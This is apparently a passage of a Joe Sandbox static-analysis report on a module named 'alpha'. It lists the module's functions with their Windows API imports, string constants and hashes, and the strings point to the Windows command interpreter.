                              • API String ID: 873889042-0
                              • Opcode ID: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction ID: 4d970e029669f59d066a17517b83e3c43bfb6b9470c017bb9cec167c1c2c28f4
                              • Opcode Fuzzy Hash: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction Fuzzy Hash: B4510675A0DB82C6E700BF12A584579BBA0FB59B91FDCA135CE5D43398CF3CE854A620
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseValue$CreateDeleteOpen
                              • String ID: %s=%s$\Shell\Open\Command
                              • API String ID: 4081037667-3301834661
                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                              • Instruction ID: 3267d56555a8c122cb016669518a906a2ca0a54083354c5a36043c1678b183d5
                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                              • Instruction Fuzzy Hash: 10719F21B0DB42C2EB60BF66A4902B9E2A1FF85794FC84531DE4E077D8DE7DD541A720
                              APIs
                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AA85
                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AACF
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AAEC
                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB39
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB6F
                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABA4
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABCB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseDeleteValue$CreateOpen
                              • String ID: %s=%s
                              • API String ID: 1019019434-1087296587
                              • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction ID: 9d44f525145640c7b39c463dc3ad528ab05c914b5cfee0453faf2141285b556a
                              • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction Fuzzy Hash: 4A519331B0CB52C6E760BF66A48476AB6A1FB89790F884234CE5D83BD8DF39D441D710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpwcsrchr
                              • String ID: COPYCMD
                              • API String ID: 2429825313-3727491224
                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                              • Instruction ID: 9f371ae61072595878d934bd41e3b6ce2c43283b6d58afd50337ea8abb0e0879
                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                              • Instruction Fuzzy Hash: C5F1AF22F0C612CAFB60BF5295842BDB2A1BB44799F884235DE5D236DCDF3DA441E360
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$FullNamePathwcsrchr
                              • String ID:
                              • API String ID: 4289998964-0
                              • Opcode ID: a87f38e7084cdb4239e3b2ad203ee547c7878674192c8843f3c2c45cb4b7c7ea
                              • Instruction ID: f6665cea42284cb4fe09f999214e6d988049e7944168af40bfc8b9259231b346
                              • Opcode Fuzzy Hash: a87f38e7084cdb4239e3b2ad203ee547c7878674192c8843f3c2c45cb4b7c7ea
                              • Instruction Fuzzy Hash: D3C1F452A0D346C2EB94BF839588379E7A0FB85B90F895930CE0E077D9DF3DA451A320
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                              • String ID:
                              • API String ID: 3476366620-0
                              • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                              • Instruction ID: 1d84f237925144ef2e2768d597958e5d9f0a2e2be4203d995c14b7b59a1acc41
                              • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                              • Instruction Fuzzy Hash: F4212C2191CA43D6FB14BF22A8952B8EA60FF49B15FCC5275CD1E422E9DF3DA405E320
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                              • String ID: %9d
                              • API String ID: 1006866328-2241623522
                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction ID: eb09f090510d4698a4e6352788c1364ff7fa4911b5ddc402d08d82a212640135
                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction Fuzzy Hash: 11516E72A0C642CAE700FF52A8845A9BBA0FB44764FC94635DE6D537D9CF3CE544AB20
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                              • Instruction ID: c2b739572ef68cd92951dde622ae732bc83c249e529814677412242b5def3ac2
                              • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                              • Instruction Fuzzy Hash: F7C1C422A0DA82C6EB60FF22E8D4AB9A3A4FB94744F884135DE1D07BD9DF3CD5419310
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                              • Instruction ID: 447974408aab9bc844bfc6f365a6db4e8dbf163e7eb1db1fbb951be4b70f9f64
                              • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                              • Instruction Fuzzy Hash: 73A1A521A1D642C6EB54BF17A4D5A79A6A0FF84B80FC85135DE4E43BD9EE3CE401A720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DiskFreeSpace
                              • String ID: %5lu
                              • API String ID: 2448137811-2100233843
                              APIs
                              Strings
                              Similarity
                              • API ID: _wcsicmp
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 2081463915-1994581435
                              APIs
                              Similarity
                              • API ID: wcschr
                              • String ID:
                              • API String ID: 1497570035-0
                              APIs
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • _pipe.MSVCRT ref: 00007FF744F06C1E
                              • _get_osfhandle.MSVCRT ref: 00007FF744F06CD1
                              • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F06CFB
                              Similarity
                              • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                              • String ID:
                              • API String ID: 624391571-0
                              APIs
                              Similarity
                              • API ID: CurrentDebugDebuggerOutputPresentStringThread
                              • String ID:
                              • API String ID: 4268342597-0
                              APIs
                              Similarity
                              • API ID: OpenToken$CloseProcessThread
                              • String ID:
                              • API String ID: 2991381754-0
                              APIs
                              • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF744F2C59E), ref: 00007FF744F05879
                                • Part of subcall function 00007FF744F058D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F05903
                                • Part of subcall function 00007FF744F058D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F05943
                                • Part of subcall function 00007FF744F058D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F05956
                              Strings
                              Similarity
                              • API ID: CloseOpenQueryValueVersion
                              • String ID: %d.%d.%05d.%d
                              • API String ID: 2996790148-3457777122
                              APIs
                              Similarity
                              • API ID: memset$ErrorFileFindFirstLast
                              • String ID:
                              • API String ID: 2831795651-0
                              APIs
                              Similarity
                              • API ID: InformationQueryToken
                              • String ID:
                              • API String ID: 4239771691-0
                              APIs
                              Similarity
                              • API ID: FileInformation$HandleQueryVolume
                              • String ID:
                              • API String ID: 2149833895-0
                              APIs
                              • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF744F24227), ref: 00007FF744F28678
                              • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF744F24227), ref: 00007FF744F286D4
                              Similarity
                              • API ID: Time$System$File
                              • String ID:
                              • API String ID: 2838179519-0
                              APIs
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • towupper.MSVCRT ref: 00007FF744F085D4
                              Similarity
                              • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                              • String ID:
                              • API String ID: 3520273530-0
                              APIs
                              Similarity
                              • API ID: InformationQueryToken
                              • String ID:
                              • API String ID: 4239771691-0
                              APIs
                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F193BB
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              APIs
                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF744F0F52A,00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F8DE
                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F8FB
                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F951
                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F96B
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0FA8E
                              • _get_osfhandle.MSVCRT ref: 00007FF744F0FB14
                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0FB2D
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0FBEA
                              • _get_osfhandle.MSVCRT ref: 00007FF744F0F996
                                • Part of subcall function 00007FF744F10010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF744F2849D,?,?,?,00007FF744F2F0C7), ref: 00007FF744F10045
                                • Part of subcall function 00007FF744F10010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F2F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F10071
                                • Part of subcall function 00007FF744F10010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F10092
                                • Part of subcall function 00007FF744F10010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F100A7
                                • Part of subcall function 00007FF744F10010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F10181
                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D401
                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D41B
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D435
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D480
                              Strings
                              Similarity
                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                              • String ID: =,;
                              • API String ID: 3964947564-1539845467
                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                              • Instruction ID: 2a5d33f45f8a975e3462be7ba45e0b2860d37ac308dfe701158e3c8acbfc360b
                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                              • Instruction Fuzzy Hash: C8024721A1D642DAEB14BF63A888579F6A1BF95B55FD88135DD0E462DCDF3CB800E230
                               Similarity
                               • API ID: _wcsicmp$iswspacewcschr
                               • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                              APIs
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F000
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F031
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                               Similarity
                               • API ID: iswdigitiswspacewcschr
                               • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                               Similarity
                               • API ID: _wcsicmp$EnvironmentVariable
                               • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                               Similarity
                               • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                               • String ID: "$=,;
                               Similarity
                               • API ID: CurrentFormatMessageThread
                               • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                               Similarity
                               • API ID: CreateFile_open_osfhandle
                               • String ID: con
                               Similarity
                               • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                               Similarity
                               • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                               • String ID: CSVFS$NTFS$REFS
                              APIs
                              • longjmp.MSVCRT(?,00000000,00000000,00007FF744F07279,?,?,?,?,?,00007FF744F0BFA9), ref: 00007FF744F24485
                               Similarity
                               • API ID: longjmp
                               • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • memset.MSVCRT ref: 00007FF744F0BA2B
                              • wcschr.MSVCRT ref: 00007FF744F0BA8A
                              • wcschr.MSVCRT ref: 00007FF744F0BAAA
                               Similarity
                               • API ID: Heapwcschr$AllocProcessmemset
                               • String ID: -$:.\$=,;$=,;+/[] "
                               Similarity
                               • API ID: memset$ErrorLast$InformationVolume
                               • String ID: %04X-%04X$~
                              APIs
                              • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F16677
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F1668F
                              • _errno.MSVCRT ref: 00007FF744F166A3
                              • wcstol.MSVCRT ref: 00007FF744F166C4
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166E4
                              • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166FE
                               Similarity
                               • API ID: iswdigit$_errnoiswalphawcschrwcstol
                               • String ID: +-~!$APerformUnaryOperation: '%c'
                               Similarity
                               • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                               • String ID: FAT$~
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D884
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D89D
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D94D
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D964
                              • _wcsnicmp.MSVCRT ref: 00007FF744F0DB89
                              • wcstol.MSVCRT ref: 00007FF744F0DBDF
                              • wcstol.MSVCRT ref: 00007FF744F0DC63
                              • memmove.MSVCRT ref: 00007FF744F0DD33
                              • memmove.MSVCRT ref: 00007FF744F0DE9A
                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0DF1F
                               Similarity
                               • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                               Similarity
                               • API ID: Heap$_wcsicmp$AllocProcess
                               • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                              • API String ID: 0-3124875276
                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                              • Instruction ID: 088bf0f6956e9922bec56c5743b53b2ed57f7dd04b52f661d996d977c8fbefa9
                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                              • Instruction Fuzzy Hash: CE516B20A0C653C2FB14BFA2E4852B9F6A0AF45B45FC94035CE0E562EDDF3CA905A720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                              • String ID: 0123456789
                              • API String ID: 1606811317-2793719750
                              • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                              • Instruction ID: aa0bc3b0296e8b54f275a3306339d5a8baa0acf11d299d94b5f44628bb04ecf0
